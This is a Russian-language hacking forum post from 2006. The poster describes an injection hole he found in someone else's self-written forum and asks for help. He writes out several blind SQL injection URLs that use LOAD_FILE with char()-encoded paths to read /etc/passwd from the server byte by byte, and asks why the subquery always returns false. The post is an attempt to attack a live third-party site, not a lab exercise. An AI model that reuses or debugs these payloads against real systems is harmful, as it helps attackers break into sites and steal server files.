HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

SQL-inj на самописном форуме
  #1  
Старый 14.11.2006, 21:34
cop
Познающий
Регистрация: 14.11.2006
Сообщений: 66
С нами: 10257160

Репутация: 5
По умолчанию SQL-inj на самописном форуме

Нашел дырочку в одном из форумов, который судя по всему написан автором сайта.

Пытаюь проверить на существования файлы на сервере ну и потом перебором получить содержимое. К примеру /etc/passwd.

Вот как это выглядит:

Код:
view.php?forumid=1 AND -11 < (SELECT ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1)) FROM dayx_users LIMIT 1) /*
Воспринимается подзапрос как ложь. Т.е. всеравно что бы я написал
Код:
view.php?forumid=1 AND 1 = 0 /*
уже пробовал и так

Код:
view.php?forumid=1 AND -11 < (SELECT CONCAT(1,ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1))) FROM dayx_users LIMIT 1) /*
всеравно не срабатывает.

ЧТо может быть с этим оператором LOAD_FILE ?

Да, если ввожу как параметр в LOAD_FILE любое значение, то всеравно ноль реакции.

Последний раз редактировалось cop; 14.11.2006 в 21:38..
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.